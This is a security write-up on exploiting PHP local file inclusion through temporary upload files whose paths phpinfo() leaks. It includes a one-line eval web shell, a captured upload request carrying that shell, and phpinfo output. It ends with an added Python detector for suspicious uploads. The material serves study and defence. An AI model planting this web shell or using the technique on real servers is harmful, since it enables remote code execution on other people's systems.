PHP local file inclusion vulnerability: building and using a test environment - Vulnerability Early Warning - Black Bar Safety Net

2016-03-16T00:00:00
ID MYHACK58:62201672623
Type myhack58
Reporter Anonymous
Modified 2016-03-16T00:00:00

Description

0x00 description


Background on PHP local file inclusion (LFI) vulnerabilities has already been covered in earlier articles on WooYun. The LFI-with-phpinfo technique was first proposed by foreign researchers; see the two papers referenced below. The principle is as follows: a PHP POST file upload produces a temporary file, phpinfo() discloses that temporary file's path and name, and the local file inclusion vulnerability is then used to include it and generate a one-line backdoor.

This method was tested successfully in a local environment. To make it easier to study and to lower the cost of learning, a Docker environment has been built for testing. With the built Docker environment deployed on a VPS abroad and the script from the poc folder of the GitHub project lfi_phpinfo run locally, a shell can still be obtained. This shows that the method is practical and that its network requirements are not very high.

> The source code is stored in the code directory and can be reproduced with docker; the poc directory holds the exploit script.

Papers:

<http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf>

<http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf>

0x01 PHP upload


Sending a POST request that uploads a file to any PHP file on the server generates a temporary file, and the temporary file's path and name can be read directly from the phpinfo page.

  • POST file upload

When any file is uploaded to PHP with the POST method, the server creates a temporary file to hold the file's contents.

To make file transfer convenient, HTTP provides a form-based HTML file upload method.

The upload form must have the attribute enctype="multipart/form-data" and must use the POST method; see: PHP file-upload.post-method

The PHP engine processes an enctype="multipart/form-data" request as follows:

  1. Request arrives
  2. Create temporary file and write the uploaded file contents
  3. Call the appropriate PHP script for processing, such as verification of name, size, etc.
  4. Delete the temporary file

The PHP engine first saves the file contents to a temporary file and then performs the appropriate operations. The temporary file name is php followed by random characters.

  • $_FILES information, including the temporary file's path and name

PHP has a superglobal variable, $_FILES, which holds information about the uploaded file, including file name, type, temporary file name, error code, and size.

0x02 Manual test: getting the temporary file path from phpinfo()


  • HTML form

File upload.html

```html
<!doctype html>
<html>
<body>
  <form action="phpinfo.php" method="POST" enctype="multipart/form-data">
    <h3> Test upload tmp file</h3>
    <label for="file">Filename:</label>
    <input type="file" name="file"/><br/>
    <input type="submit" name="submit" value="Submit" />
  </form>
</body>
</html>
```

  • Open upload.html in the browser and upload the file file.txt:

```php
<?php
eval($_REQUEST["cmd"]);
?>
```

  • View the POST request in Burp:

```
POST /LFI_phpinfo/phpinfo.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/LFI_phpinfo/upload.html
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11008921013555437861019615112
Content-Length: 368

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

<?php
eval($_REQUEST["cmd"]);
?>

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="submit"

Submit
-----------------------------11008921013555437861019615112--
```

  • The phpinfo page returned to the browser contains the following information:

```
_REQUEST["submit"]
Submit
_POST["submit"]
Submit
_FILES["file"]
Array
(
    [name] => file.txt
    [type] => text/plain
    [tmp_name] => /tmp/phpufdCHh
    [error] => 0
    [size] => 33
)
```
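The following is an added example, not code from the original article or from the lfi_phpinfo project: a request-side check that parses the multipart body from the Burp capture above and reports file parts sent to scripts that are not meant to receive uploads, as well as file parts containing a PHP open tag. The `UPLOAD_ENDPOINTS` allow-list, the `/upload.php` path, and the function names are assumptions made for illustration.

```python
import re
from email.parser import BytesParser
from email.policy import HTTP

PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
UPLOAD_ENDPOINTS = {"/upload.php"}  # assumption: the only script meant to receive files

def file_parts(content_type, body):
    """Yield (field, filename, data) for each file part of a multipart/form-data body."""
    head = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n"
    msg = BytesParser(policy=HTTP).parsebytes(head + body)
    for part in msg.iter_parts():
        if part.get_filename() is not None:
            field = part.get_param("name", header="content-disposition")
            yield field, part.get_filename(), part.get_payload(decode=True)

def inspect_upload(path, content_type, body):
    """Return findings for one POST request; an empty list means nothing to report."""
    findings = []
    if not content_type.lower().startswith("multipart/form-data"):
        return findings
    for field, filename, data in file_parts(content_type, body):
        # PHP writes this part to a temp file even if the target script ignores $_FILES.
        if path not in UPLOAD_ENDPOINTS:
            findings.append(f"file part {field!r} sent to non-upload script {path}")
        if PHP_TAG.search(data):
            findings.append(f"PHP open tag in {filename!r} ({len(data)} bytes)")
    return findings

# Constructed sample: rebuilt from the Burp request shown on this page.
BOUNDARY = "-" * 27 + "11008921013555437861019615112"
CTYPE = "multipart/form-data; boundary=" + BOUNDARY
FILE_TXT = b'<?php\neval($_REQUEST["cmd"]);\n?>\n'
BODY = b"\r\n".join([
    b"--" + BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="file"; filename="file.txt"',
    b"Content-Type: text/plain",
    b"",
    FILE_TXT,
    b"--" + BOUNDARY.encode(),
    b'Content-Disposition: form-data; name="submit"',
    b"",
    b"Submit",
    b"--" + BOUNDARY.encode() + b"--",
    b"",
])

if __name__ == "__main__":
    for finding in inspect_upload("/LFI_phpinfo/phpinfo.php", CTYPE, BODY):
        print(finding)
```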
